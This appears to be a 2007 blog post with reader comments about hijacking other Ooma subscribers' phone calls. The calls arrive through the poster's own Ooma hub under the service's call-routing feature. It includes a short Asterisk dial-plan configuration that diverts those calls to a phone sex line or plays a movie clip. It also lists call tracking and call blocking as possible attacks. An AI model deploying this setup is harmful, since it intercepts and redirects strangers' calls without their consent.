Wednesday, October 10, 2007

Ooma pranks, or "how to Punk Ashton Kutcher"

If we assume that ooma's "creative director" eats the company dog food and uses ooma, then a call made by the former TV star may eventually be directed through our ooma hub, as a result of the company's patent-pending "distributed termination." This feature can be exploited by attackers to perform various attacks, including:

  • Redirecting phone calls placed by the user to different phone numbers of the attacker’s choosing

  • Tracking phone calls placed by the user

  • Preventing the phone from dialing



Plug the output of the Ooma hub that is supposed to connect to your landline into an ATA registered to your Asterisk server.

Assume that this ATA registers as "oomahub" to your server and inbound calls arrive at the context "ooma-in". In extensions.conf we may find something like this:

[ooma-in]
exten => _XXXXXXX.,1,Goto(ooma-prank,s,1)

[ooma-prank]
exten => s,1,SetVar(X=$[${EPOCH} % 10])
exten => s,2,Goto(ooma-prank,prank-${X},1)

; The call will be directed to prank-0 thru prank-9

; prank 0 - send Ashton to a phone sex line
exten => prank-0,1,Answer
exten => prank-0,2,Dial(SIP/18007232868@tf.voipmich.com)
exten => prank-0,3,Hangup

; prank 1 - play audio clip from Ashton's classic "My Boss's Daughter"
exten => prank-1,1,Answer
exten => prank-1,2,MP3Player(music/MyBossDaughter.mp3)
exten => prank-1,3,Hangup

; ... other pranks here


Of course you know that this information is provided purely for entertainment purposes and nobody should actually do this, right?

However, it does point out some of the risks associated with using ooma's service.

4 comments:

Anonymous said...

Have you proven that any of these hacks actually work? They seem like myths to me.

Anonymous said...

This blog should not be ooma hacks but "i hate ooma"..I've visited other blogs like ipod hacks and what not and I love my iPod I would just like to do more with it. So yeah not very many hacks here just a bunch of bashing.

Site Admin said...

There is some of that. I welcome more hacks. I tried to provide sound advise in the "Right Way to Use Ooma" post for example: http://oomahacks.blogspot.com/2007/10/right-way-to-use-ooma.html

If you'd like post permission to this blog, just let me know with your Blogger ID and I can add you. One problem is there just don't seem to be that many people doing much with the box yet - very little hacking activity.

I have seen with my own eyes one case of an ATA box used to successfully capture and divert ooma calls (ATA providing PSTN line to ooma hub, inserted between ooma hub and wall jack). The person is afraid to go public with the info based on legal threats reported by Mike P and the "ooma-revealed.info" site, see http://www.goebel.net/technews/2007/09/ooma-closing-critical-website.html among others for story.

pcfreak2 said...

Let me know when you get a custom firmware running on the Ooma

That'll be a hack